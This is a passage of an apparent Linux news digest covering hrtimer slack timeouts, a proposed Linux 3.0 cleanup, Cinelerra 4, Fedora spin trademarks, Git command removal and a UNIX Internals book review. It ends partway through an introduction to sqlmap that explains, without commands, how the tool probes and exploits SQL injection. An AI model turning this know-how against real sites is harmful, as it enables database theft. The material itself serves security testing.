A different solution came in the form of Arjan's range-capable timer patch set.
This patch extends hrtimers to accept two timeout values, called the "soft"
and "hard" timeouts.  The soft value - the shorter of the two - is the
first time at which the timeout can expire; the kernel will make its best
effort to ensure that it does not expire after the hard period has
elapsed.  In between the two, the kernel is free to expire the timer at any
convenient time.

It's a useful feature, but it comes at the cost of some significant API
changes.  To begin with, the expires field of struct
hrtimer goes away.  Rather than manipulate expires directly,
kernel code must now use one of the new accessor functions:


Once that's done, the range capability is added to hrtimers.  By default,
the soft and hard expiration times are the same; code which wishes to set
them independently can use the new functions:


In the new "set" functions, the specified time is the soft
timeout, while time+delta provides the hard timeout value.  There
is also another form of schedule_timeout():


With this infrastructure in place, poll() and friends can be given
approximate timeouts; the only remaining question is just how wide the
range of times should be.  In Arjan's patch, that range comes from two
different sources.  The first is a new field in the task structure called
timer_slack_ns; as one might expect, it specifies the maximum
expected timer accuracy in nanoseconds.  This value can be adjusted via the
prctl() system call.  The default value is set to
50 microseconds - approximate to a certain degree, but still far more
accurate than the timeouts in current kernels.

Beyond that, though, there is a heuristic function which provides an
accuracy value depending on the requested timeout period.  In the case of
especially long timeouts - more than ten seconds - the accuracy is set to
100ms; as the timeouts get shorter, the amount of acceptable error drops,
down to a minimum of 10ns for very brief timeouts.  Normally,
poll() and company will use the value returned by the heuristic,
but with the exception that the accuracy will never exceed the value found
in timer_slack_ns.

The end result is the provision of more accurate timeouts on the polling
functions while, simultaneously, preserving the ability to combine timeouts
with other system events.

		Linux 3.0?


The Linux kernel
summit is happening this month, so various discussion topics are being
tossed around on the Ksummit-2008-discuss
mailing list.  Alan Cox suggested
a Linux release that would "throw out" some accumulated, unmaintained cruft
as a topic to be discussed.
Cox would like to see
that release be well publicized, with a new release number, so that the
intention of the release would be clear.  While there will be disagreements
about which drivers and subsystems can be removed, participants in
the thread seem favorably disposed to the idea—at
least enough that it should be discussed. 


There is already a process in place for deprecating and eventually removing
parts of the kernel that need it, but it is somewhat haphazardly used.  Cox
proposes: 

At some point soon we add all the old legacy ISA drivers (barring the odd
ones that turn up in embedded chipsets on LPC bus) into the
feature-removal list and declare an 'ISA death' flag day which we brand
2.8 or 3.0 or something so everyone knows that we are having a single
clean 'throw out' of old junk.

It would also be a chance to throw out a whole pile of other "legacy"
things like ipt_tos, bzImage symlinks, ancient SCTP options, ancient
lmsensor support, V4L1 only driver stuff etc.


Cox's list sparked immediate protest about some of the items on it, but the
general idea was well received.  There are certainly sizable portions of
the kernel,
especially for older hardware, that are unmaintained and probably completely
broken.  No one seems to have any interest in carrying that stuff forward,
but, without a concerted effort to identify and remove crufty code, it is
likely to remain.  Cox has suggested one way to make that happen;
discussion at the kernel summit might refine his idea or come up with
something entirely different.


Part of the reason that unmaintained code tends to hang around is that the
kernel hackers have gotten much better at fixing all affected code when
they make an API change.  While that is definitely a change for the better,
it does 
have the effect of sometimes hiding code that might be ready to be removed.  In
earlier times, dead code would have become unbuildable after an API change
or two leading to either a
maintainer stepping up or the code being removed.


The need to make a "major" kernel release, with a corresponding change to
the major or minor release number is the biggest question that the kernel
hackers seem to have.  Greg Kroah-Hartman asks: 

Can't we do all of the above today in our current model?  Or is it just
a marketing thing to bump to 3.0?  If so, should we just pick a release
and say, "here, 2.6.31 is the last 2.6 kernel and for the next 3 months
we are just going to rip things out and create 3.0"?


There is an element of "marketing" to Cox's proposal.  Publicizing a major
release, along with the intention to get rid of "legacy" code, will allow
interested parties to step up to maintain pieces that they do not want to
see removed.  As Cox, puts
it:

I thought it might be useful to actually draw some definite lines so we
can actually get around to throwing stuff out rather than letting it rot
forever and also if its well telegraphed both give people a chance to fix
where the line goes and - yes - as a marketing thing as much as anything
else to define the line in a way that non-techies, press etc get.

Plus it appeals to my sense of the open source way of doing things
differently - a major release about getting rid of old junk not about
adding more new wackiness people don't need 8)


Arjan van de Ven thinks
that gathering the list of things to be removed is a good exercise:

I like the idea of at least discussing this, and for a bunch of people
making a long 
list of what would go.
Based on that whole list it becomes a value discussion/decision; is there
enough of 
this to make it worth doing.


Once the list
has been gathered and discussed, van de Ven notes, 
it may well be that it can be done under
the current development model, without a major release. "But let's at
least do the exercise. It's worth validating the model we have 
once in a while ;)"


This may not be the only discussion of kernel version numbers that takes
place at the summit.  Back in July, Linus Torvalds mentioned a bikeshed painting project that he
planned to bring up.  It seems that Torvalds is less than completely happy
with how large the minor release number of the kernel is; he would like to
see numbers that have more meaning, possibly date-based:

The only thing I do know is that I agree that "big meaningless numbers" 
are bad. "26" is already pretty big. As you point out, the 2.4.x series 
has much bigger numbers yet.

And yes, something like "2008" is obviously numerically bigger, but has a 
direct meaning and as such is possibly better than something arbitrary and 
non-descriptive like "26".


Version numbers are not important, per se, but having a consistent,
well-understood numbering scheme certainly is.  The current system has been
in place for four years or so without much need to modify it.  That may
still be the case, but with ideas about altering it coming from multiple
directions, there could be changes afoot as well.   


For
the kernel hackers themselves, there is little benefit—except,
perhaps, preventing the annoyance of ever-increasing numbers—but version
numbering does provide a mechanism to communicate with the "outside
world".  Users have come to expect the occasional major release, with some
sizable and visible chunk of changes, but the current incremental kernel
releases do not provide that numerically; instead, big changes come
with nearly every kernel release.  There may be value in raising the
visibility of one particular release, either as a means to clean up the
kernel or to move to a different versioning scheme—perhaps both at once.


		Cinelerra 4 arrives


Cinelerra
is a compositing video and audio editor that is being developed by
Heroine Virtual LTD's
Adam Williams when he isn't playing with
autonomous miniature helicopters.
Cinelerra is derived from the now-discontinued Broadcast 2000 project.
The project is described:


Unleash the 50,000 watt flamethrower of content creation in your UNIX box. Cinelerra does primarily 3 things: capturing, compositing, and editing audio and video with sample level accuracy. It's a movie studio in a box.
If you want the same kind of editing suite that the big boys use, on an efficient UNIX operating system, it's time for Cinelerra.
Cinelerra is not community approved and there is no support from the developer. Donations to community websites do not fund Cinelerra development.


The
Wikipedia entry
for Cinelerra summarizes the project's window set:


The user is presented with four screens:
1. The timeline, which gives the user a time-based view of all video and audio tracks in the project, as well as keyframe data for e.g. camera movement, effects, or opacity;
2. the viewer, which gives the user a method of "scrubbing" through footage;
3. the resource window, which presents the user with a view of all audio and video resources in the project, as well as available audio and video effects and transitions; and
4. the compositor, which presents the user with a view of the final project as it would look when rendered. The compositor is interactive in that it allows the user to adjust the positions of video objects; it also updates in response to user input.


The main
Cinelerra
page lists the software's many features.
Version 4.0 of Cinelerra was released on August 8, 2008, the

change log details the most recent feature additions.
Older project history is available in the
news document.
One big change for this release is the availability of pre-compiled
binaries for 32 and 64 bit versions of Ubuntu 8.04.
This can be a real time saver due to the complexity of the
build process, and will give access to a wider variety of users.


Cinelerra works best with specific hardware configurations.
An NVidia graphic card is recommended:
"Cinelerra supports OpenGL shaders on NVidia graphics cards. The video crunching power that was once exclusively the domain of SGI minicomputers is now yours. NVidia users can run many effects in realtime instead of rendering them. OpenGL also opens up new video resolutions, up to 4096x4096 on high end cards."
And a 64 bit Linux platform is a good idea:
"Since it's Linux, it's been 64 bit compliant for years. In fact, Cinelerra is only recommended for 64 bit mode. The reason is the large amount of virtual memory required for page flipping and floating point images often exceeds the limit of 32 bits. "


Your author has used Cinelerra in the past for audio editing, see
this article
for details.
Cinelerra has one capability that is hard to find in other Linux audio
editing software, the ability to split (render) a huge .wav file
into a group of smaller .wav files across multiple position labels,
all in one operation.
This feature is useful for processing long audio recordings such
as digitized vinyl album sides and copies of digital audio (DAT) tapes.
This was the first operation that Cinelerra 4 was tried on.
After some initial crashing difficulties, a startup warning message about
an insufficient shmmax value was heeded.
Changing shmmax is simply a matter of running
echo  0x7fffffff &gt; /proc/sys/kernel/shmmax as root before
starting Cinelerra.  After doing that, your author was unable to make the
software crash while processing audio.


Lacking a high resolution video camera, your author was able to use his
Nikon Coolpix S10 VR digital camera to produce low
resolution .mov format movies with mono audio tracks.
Cinelerra was able to display videos from this camera,
specifically movies of thunderstorms.
Individual frames containing lightning strikes were located
by single stepping through interesting sections of the movie, the
still frames were grabbed from the screen using an
external application (xv).  The single-step capability allowed the
life cycle of a lightning bolt to be observed.
This is a much less expensive way to procure photographs of lightning
compared to using lots of 35mm film and

specialized hardware.


Attempts to do actual video editing were somewhat less successful
than simple playback.  Creating a fade-in at the beginning of a
short video clip worked, but several attempts to add a second
video track crashed Cinelerra, as did saving a modified track.
This may be related to the camera's data, which has confused other
video players (mplayer) in the past or the lack of a professional
quality video device.
The computer was running a (not recommended) 32-bit
version of Ubuntu and an older Radeon video card.  As with high-end
audio processing, it is probably best to put together a system
with the specific hardware and operating system that is recommended
for the application.


While Cinelerra is more of a professional video tool than
a generic desktop application, it nonetheless has some very
useful capabilities outside of its primary application space.
It is the most full-featured video
playback application that your author has experimented with,
and it functions nicely as an audio processing tool.


		Spinning Fedora


There was a discussion recently on the fedora-advisory-board list about
when a derivative is an official spin vs. one that is Fedora based.  It
started out innocently enough with a request
for trademark approval for an Appliance Operating Spin.

Right away Bill Nottingham noted that
SELinux is disabled in this spin and wondered why.  The answer was simple
enough, there are some current issues with the building tool and SELinux.

A simple enough start to what turned into a somewhat lengthy discussion of
what makes Fedora Fedora.  This is not the first time that the Fedora
Advisory Board has tackled this issue, but it seems that not all board
members are in complete agreement of the difference between an official
Fedora spin and something which is merely Fedora based.

Jesse Keating recalled a conversation that
took place during the merge of core and extras on whether or not there
should be a "Fedora Standard Base".  

That is, a basic set of
things you must have in your "spin" in order to call it Fedora.  These
include things like rpm, yum, and SELinux (at least in my opinion), but
we never really coded this up nor hashed out what should be in the FSB,
or if FSB was even a good name for the concept.


A draft 
version of trademark guidelines is available, and awaiting comments
and approval by the Fedora Board.  The guidelines in this document do not
make any packages mandatory for trademark approval.  They do state that
official spins will include only those packages that are available in the
official Fedora repository.  Pretty much all spins, with the notable
exception of the Everything Spin, will contain a subset of all the packages
in the repository and are left to chose which packages they need or don't
need.

Axel Thimm posted that official spins
should have high standards and should improve the brand name.

Currently I cannot imagine Fedora w/o rpm or yum, but I can imagine it
w/o selinux if I think about very small footprints, nano-Fedoras and
all the recent suggestion. I wouldn't mind my phone to advertise that
it runs on Fedora, even if selinux was turned off (but the high
standard of security is ensured in another way).

Since we can't envision what nice spins/derivatives people will come up
with (I first heard of the appliance spin), we should not statically
enforce any requirements, but instead have the board be the checking
instance like it is now.


Of course, it's not just about the trademarks.  The discussion also brought
up the kickstart pool and whether unofficial spins should be included in
the pool, or even whether all official spins should be included.  So there
could be trademarked Fedora spins that aren't allowed in the kickstart
pool, perhaps because of their choice of packages.  Or there could be
"Xora", a Fedora based distribution, that would be in the kickstart pool
and available in the Fedora Hosted service.

Jeff Spaleta looked at how the kickstart
pool might be structured.

Under the current workflow, there are essentially 3 different technical
levels.
1) Spin SIG best practices to get into kickstart pool
2) Technical issues which are associated with trademark approval
3) Technical requirements for RelEng for 'release' of a spin.

These can be layered technical hurdles, which  the kickstart pool
could be structured to mimic.


The bottom line, in this instance, seems to be that AOS (Appliance
Operating Spin) will likely get trademark approval, since it only contains
official Fedora packages.  However, unless they get SELinux running on it,
either with permissive mode or with a custom policy, it won't get into the
kickstart pool.  Or perhaps it will be relegated to a second-class pool.

It may seem odd that an appliance needs SELinux, but as Jeroen van Meeuwen
says:  "On the other hand, of course
we do have an agenda to push and that agenda includes SELinux as being one
of the core features of the entire Fedora line of products (including the
few enterprise linux spin-offs).  It's one of the main features and we
would rather see appliances built upon an AOS that has SELinux enforcing by
default while it can still be disabled."

		Feature removal sparks Git flamewar


Removing features from a tool is never easy.  Once there is enough of a
user base to complain about annoyances, there is also a vocal group that
uses and likes those same annoyances.  The recent removal of the
git-foo 
style commands from Git is just such a case, but many of those
using those commands did not find out
about the removal until after the change was made, which only served to
increase their outrage.


Until version 1.6.0, Git has always had two ways to invoke the same
functionality: git foo and git-foo.  This was done by
installing many—usually more than 100—different entries into
/usr/bin for all of the different git subcommands.  Some were
concerned that Git was polluting that directory, but the bigger issue was
the effect on new users.  Partially because of shell autocompletion, a new
user might be overwhelmed by the number of different Git commands
available; even regular users might find it difficult to find the command
they are looking for if they have to sort through 100 or more.


Many of the Git subcommands that exist are not necessarily regularly used.
There are quite a number of "plumbing" commands that rarely, if ever,
should be invoked by users. Those are best hidden from view, which can be
done by moving them out of /usr/bin.  This has been done for the
1.6.0 release, but Junio Hamano opened up a can of worms when he posted a
request for discussion about taking the
next step to the Git mailing list.


In the 1.6.0 release, the only things exposed in /usr/bin are the 
git binary itself along with a few other utilities; the rest have been
moved to /usr/libexec/git-core.  The hard links for each of the
git-foo commands have been maintained in the new location, which
allows folks that 
still want the old behavior to get it by adding:

to .bashrc (or some other startup file, depending on the shell).
This would allow users—especially scripts—to continue using the
dash versions of commands. 


Unfortunately, for many users, the first they heard about this change was when
things stopped working after they installed 1.6.0.  The Git team admittedly
did not get the word out very well; by trying to be nice, they missed an
opportunity to make users notice the change.  As Hamano puts it:

But that niceness backfired.  Many people seem to argue now that we should
have annoyed people by throwing loud deprecation notices to stderr when
they typed "git-foo", and we should have risked breaking their scripts iff
they relied on not seeing anything extra on the stderr.


Hamano got caught in the middle to some extent as he wasn't particularly in
favor of the original change, but at the time it was decided, there were
few advocates for keeping 100+ commands in /usr/bin.  There were
several complaints about having that many commands, but chief amongst them
was confusion for new users.  By removing them from /usr/bin and
providing an autocompletion script for bash that completes only a subset of
the git 
subcommands, users will have fewer options to scan through—and to be
scared of.


The original plan called for moving the dash-style commands out, which has
been done, but also eventually removing the links for any of the
git-foo commands that are implemented in the core git
binary.  Over time, much of the functionality that was handled by external
commands has migrated into the main git program.
It is the eventual removal of the links that Hamano is asking about in his
message, but 
much of the response was flames about the step already taken; some
could not see any advantage to moving the git-foo commands out of
/usr/bin. 


David Woodhouse is one of those who wants
things to remain the same:

 Just don't do it. Leave the git-foo commands as they were. They
      weren't actually hurting anyone, and you don't actually _gain_
      anything by removing them. For those occasional nutters who
      _really_ care about the size of /usr/bin, give them the _option_
      of a 'make install' without installing the aliases.


Several others agreed, but that particular horse had already left the
barn.  Throughout the thread, Linus Torvalds was increasingly strident about the
$PATH-based workaround, which effectively ends the discussion that
Hamano was trying to have.  For that workaround to continue working, the links must be
installed in /usr/libexec/git-core.  Though it strays from the
original intent, it is a reasonable compromise, one that will serve
git-traditionalists as well as new users and others who no longer want the
git-foo syntax.


Two things have helped keep the controversy alive: some documentation,
test, and example scripts still refer to dash-style commands, but worse
than that, one must do man git-foo to get the man page for that
subcommand.  It is a convention within the Git community to use the
dash style when referring to commands in text, which explains some of the
usage.  Because man requires a single argument, the dash style is
used there as well, though git help foo is a reasonable
alternative.  For users who started relatively early with Git, and are aware of
the dash style commands, these examples further muddy the water.


It is a difficult problem.  Projects must have room to change, but once
users become used to a particular way of doing things, they will resist
changing—sometimes quite loudly.  As Petr "Pasky" Baudis points out, though, Git 
is still evolving:

You can't ask us to stop making any incompatible changes - Git is still
too young for that and it's UI got evolved, not designed. But we do
document the changes we do, even though we might do a better job
*spreading* the word.


The Git developers still see it as a young tool that may still undergo some
fairly substantial modifications, while the hardcore users see it is a
fixed tool that they use daily—or more frequently—to get work
done.  The tension between those two views is what leads to flamewars like
we have seen here.  Certainly the Git folks could have done a much better
job in getting the word out—Hamano was looking for suggestions on how to
do that better in his original post—but users are going to have to be
flexible as well.


		The Kernel Hacker's Bookshelf: UNIX Internals


Back in 2001, I landed my (then) dream job as a full-time Linux kernel
developer and distribution maintainer for a small embedded systems company.
I was thrilled - and horrified.  I'd only been working as a programmer
for a couple of years and I was sure it was only a matter of time
before my new employer figured out they'd hired an idiot.  The only
solution was to learn more about operating systems, and quickly.  So I
pulled out my favorite operating systems textbook and read and re-read
it obsessively over the course of the next year.  It worked well
enough that my company tried very hard to convince me not to quit when
I got bored with my "dream job" and left to work at Sun.


That operating systems textbook was
UNIX
Internals by Uresh Vahalia.  UNIX Internals is a careful, detailed
examination of multiple UNIX implementations as they evolved over
time, from the perspective of both the academic theorist and the
practical kernel developer.  What makes this book particularly
valuable to the practicing operating systems developer is that the
review of each operating systems concept - say, processes and threads
- is accompanied by descriptions of specific implementations and their
histories - say, threading in Solaris, Mach, and Digital UNIX.  Each
implementation is then compared on a number of practical levels,
including performance, effect on programming interfaces, portability,
and long-term maintenance burden - factors that Linux developers care
passionately about, but are seldom considered in the academic
operating systems literature.


UNIX Internals was published in 1996.  A valid question is whether a
book on the implementation details of UNIX operating systems published
so long ago is still useful today.  For example, Linux is only
mentioned briefly in the introduction, and many of the UNIX variants
described are now defunct.  It is true that UNIX Internals holds
relatively little value for the developer actively staying up to date
with the latest research and development in a particular area.
However, my personal experience has been that many of the problems
facing today's Linux developers are described in this book - and so
are many of the proposed solutions, complete with the unsolved
implementation problems.  More importantly, the analysis is often
detailed enough that it describes exactly the changes needed to
improve the technique, if only anyone took the time to implement them.


In the rest of this review, we'll cover two chapters of UNIX Internals
in detail, "Kernel Memory Allocation" and "File System
Implementations."  The chapter on kernel memory allocation is an
example of the historical, cross-platform review and analysis that
sets this book apart, covering eight popular allocators from several
different flavors of UNIX.  The chapter on file system implementations
shows how lessons learned from the oldest and most basic file system
implementations can be useful when solving the latest and hottest file
system design problems.

Kernel Memory Allocation

The kernel memory allocator (KMA) is one of the most
performance-critical kernel subsystems.  A poor KMA implementation
will hurt performance in every code path that needs to allocate or free
memory.  Worse, it will fragment and waste precious kernel memory -
memory that can't be easily freed or paged out - and pollute hardware
caches with instructions and data used for allocation management.
Historically, a KMA was considered pretty good if it only wasted 50%
of the total memory allocated by the kernel.


Vahalia begins with a short conceptual description of kernel memory
allocation and then immediately dives into practical implementation,
starting with page-level allocation in BSD.  Next, he describes memory
allocation in the very earliest UNIX systems: a collection of
fixed-size tables for structures like inodes and process table
entries, occasional "borrowing" of blocks from the buffer cache, and a
few subsystem-specific ad hoc allocators.  This primitive approach
required a great deal of tuning, wasted a lot of memory, and made the
system fragile.


What constitutes a good KMA?  After a quick review of the functional
requirements, Vahalia lays out the criteria he'll use to judge the
allocators: low waste (fragmentation), good performance, simple
interface appropriate for many different users, good alignment,
efficient under changing workloads, reassignment of memory allocated
for one buffer size to another, and integration with the paging
system.  He also takes into consideration more subtle points, such as
the cache and TLB footprint of the KMA's code, along with cache and
lock contention in multi-processor systems.


[PULL QUOTE: 
This is an
example of how even the oldest and clunkiest algorithms can influence the
design of the latest and greatest.
 END QUOTE]


The first KMA reviewed is the resource map allocator, an extremely
simple allocator using a list of &lt;base, size&gt; pairs
describing each free segment of memory, sorted by base address.  The
charms of the resource map allocator include simplicity and allocation
of exactly the size requested; the vices include high fragmentation
and poor performance under nearly every workload.  Even this
allocation algorithm is useful under the right circumstances; Vahalia
describes several subsystems that still use it (System V semaphore
allocation and management of free space in directory blocks on some
systems) and some minor tweaks that improve the algorithm.  One tweak
to the resource map allocator keeps the description of each free
region in the first few bytes of the region, a technique later used in
the state-of-the-art SLUB allocator in the Linux kernel.  This is an
example of how even the oldest and clunkiest algorithms can influence the
design of the latest and greatest.


Each following KMA is discussed in terms of the problems it solves
from previous allocators, along with the problems it introduces.  The
resource map's sorted list of base/size pairs is followed by
power-of-two free lists with a one-word in-buffer header (better
performance, low external fragmentation, but high internal
fragmentation, esp. for exact power-of-two allocations), the
McKusick-Karels allocator (power-of-two free lists optimized for
power-of-two allocation; extremely fast, but prone to external
fragmentation), the buddy allocator (buffer splitting on power-of-two
boundaries plus coalescing of adjacent free buffers; poor performance
due to unnecessary splitting and coalescing), and the lazy buddy
allocator (buddy plus delayed buffer coalescing; good steady-state
performance but unpredictable under changing workloads).  The
accompanying diagrams of the data structures and buffers used to
implement each allocator are particularly helpful in understanding the
structure of the allocators.


After covering the simpler KMAs, we get into more interesting
territory: the zone allocator from Mach, the hierarchical allocator
from Dynix, and the SLAB allocator, originally implemented on Solaris
and later adopted by several UNIXes, including Linux and the BSDs.
Mach's zone allocator is the only fully garbage-collected KMA studied,
with the concomitant unpredictable system-wide performance slowdowns
during garbage collection, which would strike it from most developers'
lists of useful KMAs.  But as with the resource map allocator, we
still have lessons to learn from the zone allocator.  Many of the
features of the zone allocator also appear in the SLAB allocator,
commonly considered the current best-of-breed KMA.


The zone allocator creates a "zone" of memory reserved for each class
of object allocated (e.g., inodes), similar to kmem caches in the
later SLAB allocator.  Pages are allocated to a zone as needed, up to
a limit set at zone allocation time.  Objects are packed tightly
within each zone, even across pages, for very low internal
fragmentation.  Anonymous power-of-two zones are also available.  Each
zone has its own free list and once a zone is set up, allocation and
freeing simply add and remove items from the per-zone free list (free
list structures are also allocated from a zone).  Memory is reclaimed
on a per-page basis by the garbage collector, which runs as part of
the swapper task.  It uses a two-pass algorithm: the first pass counts
up the number of free objects in each page, and the second pass frees
empty pages.  Overall, the zone allocator was a major improvement on
previous KMAs: fast, space efficient, and easy to use, marred only by
the inefficient and unpredictable garbage collection algorithm.


The next KMA on the list is the hierarchical memory allocator for
Dynix, which ran on the highly parallel Sequent S2000.  One of the
major designers and implementers is our own Paul McKenney, familiar to
many LWN readers as the progenitor of the read-copy-update (RCU)
system used in many places in the Linux kernel.  The goal of the Dynix allocator was
efficient parallel memory allocation, in particular avoiding lock
contention between processors.  The solution was to create several
layers in the memory allocation system, with per-cpu caches at the
bottom and collections of large free segments at the top.  As memory
is freed or allocated, regions move up and down one level of the
hierarchy in batches.  For example, each per-cpu cache has two free
lists, one in active use and the other in reserve.  When the active
list runs out of free buffers, the free buffers from the reserve list
are moved onto it, and the reserve list replenishes itself with
buffers from the global list.  All the work requiring synchronization
between multiple CPUs happens in one big transaction, rather than
incurring synchronization overhead on each buffer allocation.


The Dynix allocator was a major advance: 3 - 5 times faster than the
BSD allocator even on a single CPU.  Its memory reclamation system was
far more efficient than the zone allocator's, performed on an on-going
basis with bounded worst case performance on each operation.
Performance on SMP systems was unparalleled.


The final KMA in this chapter is the SLAB allocator, initially
implemented on Solaris and later re-implemented on Linux and BSD.  The
SLAB allocator refined some existing techniques (simple allocation/free
computations for small cache footprint, per-object caches) and
introduced several new ones (cache coloring, efficient object reuse).
The result is an allocator that was both the best performing and the
most efficient by a wide margin - only 14% fragmentation versus 27%
for the SunOS 4.1.3 sequential-fit allocator, 45% for the 4.4BSD
McKusick-Karel allocator, and 46% for the SunOS 5.x buddy allocator.


Like the zone allocator, SLAB allocates per-object caches (along with
anonymous caches in useful sizes) called kmem caches.  Each cache has
an associated optional constructor and destructor function run on the
objects in a newly allocated and newly freed page, respectively (though the
destructor has since been removed in the Linux allocator).
Each cache is a doubly-linked list of slabs - large contiguous chunks
of memory.  Each slab keeps its slab data structure at the end of the
slab, and divides the rest of the space into objects.  Any leftover
free space in the slab is divided between the beginning and end of the
objects in order to vary the offset of objects with respect to the CPU
cache, improving cache utilization (in other words, cache coloring).
Each object has an associated 4-byte free list pointer.


The slabs within each kmem cache are in a doubly linked list, sorted
so that free slabs are located at one end, fully allocated slabs at
the other, and partially allocated slabs in the middle.  Allocations
always come from partially allocated slabs before touching free
slabs.  Freeing an object is simple: since slabs are always the same
size and alignment, the base address of the slab can be calculated
from the address of the object being freed.  This address is used to
find the slab on the doubly linked list.  Free counts are maintained
on an on-going basis.  When memory pressure occurs, the slab allocator
walks the kmem caches freeing the free slabs at the end of the cache's
slab list.  Slabs for larger objects are organized differently, with
the slab management structure allocated separately and additional
buffer management data included.


This section of UNIX Internals has aged particularly well, partly
because the SLAB allocator continues to work well on modern systems.
As Vahalia notes, the SLAB allocator initially lacked optimizations
for multi-processor systems, but these were added shortly afterward,
using many of the same techniques as the Dynix hierarchical allocator.
Since then, most production kernel memory allocators have been
SLAB-based.  Recently, Christoph Lameter rewrote SLAB
to get the SLUB allocator for Linux; both are available as kernel
configuration options. (The third option, the SLOB allocator, is not
related to SLAB - it is a simple allocator optimized for small
embedded systems.) When viewed in isolation, the SLAB allocator may
appear arbitrary or over-complex; when viewed in the context of
previous memory allocators and their problems, the motivation behind
each design decision is intuitive and clear.

File Systems Implementations

UNIX Internals includes four chapters on file systems, covering the
user and kernel file system interface (VFS/vnode), implementations of
on-disk and in-memory file systems, distributed/network file systems,
and "advanced" file system topics - journaling, log-structured file
systems, etc.  Despite the intervening years, these four chapters are
the most comprehensive and practical description of file systems
design and implementation I have yet seen.  I definitely recommend it
over
UNIX
File System Design and Implementation - a massive sprawling book
which lacks the focus and advanced implementation details of UNIX
Internals.


The chapter on file systems implementations is too packed with useful
detail to review fully in this article, so I'll focus on the points
that are relevant to current hot file system design problems.  The
chapter describes the System V File System (s5fs) and Berkeley Fast
File System (FFS) implementations in great detail, followed by a
survey of useful in-memory file systems, including tmpfs, procfs
(a.k.a. /proc file system), an early variant of a device file
system called specfs, and a sysfs-style interface for managing
processors.  This chapter also covers the implementation of buffer
caches, inode caches, directory entry caches, etc.  One of the
features of this chapter (as elsewhere in the book) is the carefully
chosen bibliography.  Bibliographies in research papers serve a double
purpose as demonstrations of the authors' breadth of knowledge in the
area and tend to be cluttered with more marginal references; the
per-chapter bibliographies in UNIX Internals list only the most
relevant publications and make excellent supplementary reading guides.


System V File System (s5fs) evolved from the first UNIX file system.  The
on-disk layout consisted of a boot block followed by a superblock
followed by a single monolithic inode table.  The remainder of the
disk is used for data and indirect blocks.  File data blocks are
located via a standard single/double/triple indirect block scheme.
s5fs has no block or inode allocation bitmaps; instead it maintains
on-disk free lists.  The inode free list is partial; when no more free
inodes are on the list, it is replenished by scanning the inode table.
Free blocks are tracked in a singly linked list rooted in the
superblock - a truly terrifying design from the point of view of file
system repair, especially given the lack of backup superblocks.


In many respects, s5fs is simultaneously the simplest and the worst
UNIX file system possible: its throughput was commonly as little as 5%
of the raw disk bandwidth, it was easily corrupted, it had a 14
character limit on file names, and so on.  On the other hand, elements
of the s5fs design have come back into vogue, often without addressing
the inherent drawbacks still unsolved in the intervening decades.


The most striking example of a new/old design principle illustrated by
s5fs is the placement of most of the metadata in one spot.  This
turned out to be a key performance problem for s5fs, as every uncached
file read virtually guaranteed a disk seek of non-trivial magnitude
between the location of the metadata at the beginning of the disk and
the file data, located anywhere except the beginning of the disk.  One
of the major advances of FFS was to distribute inodes and bitmaps
evenly across the disk and allocate associated file data and indirect
blocks nearby.  Recently, collecting metadata in one place has
returned as a way to optimize file system check and repair time as
well as other metadata-intensive operations.  It also appears in
designs that keep metadata on a separate high-performance device
(usually solid state storage).


The problems with these schemes are the same as the first time around.
For the fsck optimization case, most normal workloads will suffer from
the required seek for reads of file data from uncached inodes (in
particular, system boot time would suffer greatly).  In the separate
metadata device case, the problem of keeping a single,
easily-corrupted copy of important metadata returns.  Currently, most
solid-state storage is less reliable than disk, yet most proposals to
move file system metadata to solid state storage make no provision for
backup copies on disk.


Another cutting edge file system design issue first encountered in
s5fs is backup, restore, and general manipulation of sparse files.
System administrators quickly discovered that it was possible to
create a user-level backup that could not be restored because the
tools would attempt to actually write (and allocate) the zero-filled
unallocated portions of sparse files.  Even more intelligent tools
that do not explicitly write zero-filled portions of files still had
to pointlessly copy pages of zeroes out of the kernel when reading
sparse files.  In general, the file and socket I/O interface requires
a lot of ultimately unnecessary copying of file data into and out of
the kernel for common operations.  It has only been in the last few
years that more sophisticated file system interfaces have been
proposed and implemented, including SEEK_HOLE/SEEK_DATA
and splice() and friends.


The chapters on file systems are definitely frustratingly out of date,
especially with regard to advances in on-disk file system design.
You'll find little or no discussion of copy-on-write file systems,
extents, btrees, or file system repair outside of the context of
non-journaled file systems.  Unfortunately, I can't offer much in the
way of a follow-up reading list; most of the papers in my
file systems reading list
are covered in this book (exceptions include the papers on soft
updates, WAFL, and XFS).  File systems developers seem to publish less
often than they used to; often the options for learning about the
cutting edge are reading the code, browsing the project wiki, and
attending presentations from the developers.  Your next opportunity
for the latter is the Linux
Plumbers Conference, which has a number of file system-related
talks.


Another major flaw in the book, and one of the few places where
Vahalia was charmed by an on-going OS design fad, is the near-complete
lack of coverage of TCP/IP and other networking topics (the index
entry for TCP/IP lists only two pages!).  Instead, we get an entire
chapter devoted to streams, at the time considered the obvious next
step in UNIX I/O.  If you want to learn more about UNIX networking
design and implementation, this is the wrong book; buy some of the
Stevens and Comer networking books instead.

Summary

UNIX Internals was the original inspiration for the Kernel Hacker's
Bookshelf series, simply because you could always find it on the
bookshelf of every serious kernel hacker I knew.  As the age of the
book is its most serious weakness, I originally intended to wait until
the planned second edition was released before reviewing it.  To my
intense regret, the planned release date came and went and the second
edition now appears to have been canceled.


UNIX Internals is not the right operating systems book for everyone;
in particular, it is not a good textbook for an introductory operating
systems course (although I don't think I suffered too much from the
experience).  However, UNIX Internals remains a valuable reference book
for the practicing kernel developer and a good starting point for
the aspiring kernel developer.


		Find SQL injection vulnerabilities with sqlmap


SQL injections are a particularly
nasty type of web application vulnerability that can lead to loss or
disclosure of the contents of a database.  Testing a web application to find SQL
injection holes can be a tedious process, which is where the sqlmap tool may come in handy.
sqlmap automates the process of testing a particular web page for various
kinds of SQL injection flaws.


Sqlmap is a command-line driven Python application that can help in both
finding and exploiting SQL injections.  By giving it a URL and parameter
names of interest (from HTML forms or GET parameters), it tries to
determine which of those parameters cause different output based on their
value, indicating that they control the dynamic behavior of the
application.  Those parameters are then tested by repeatedly making an HTTP 
request with slightly different values.  Each of the values passed
corresponds to a SQL injection technique, such as appending a
single-quote.  Based on whether the HTML response is different from the
original response, the
potential for a SQL injection can be inferred.


The tool also tests an often overlooked input source: cookies.  The user
can specify a cookie value which the tool will then manipulate to attempt a
SQL injection via the cookie.  Since many applications store their session
information in a database using the cookie value as a key, this is a
relatively common route to SQL injection—one that penetration tests
sometimes miss.


While it does help remove some of the tedium involved in testing for SQL
injections, sqlmap is by no means an automated solution.  A fair amount of
work is required to find a vulnerable parameter. Once a
vulnerability has been found, though, a great deal of information,
including database contents, can be retrieved with a single command.


Like many security tools, sqlmap can be used by those of malicious intent
rather easily.  The automated retrieval of database passwords and contents
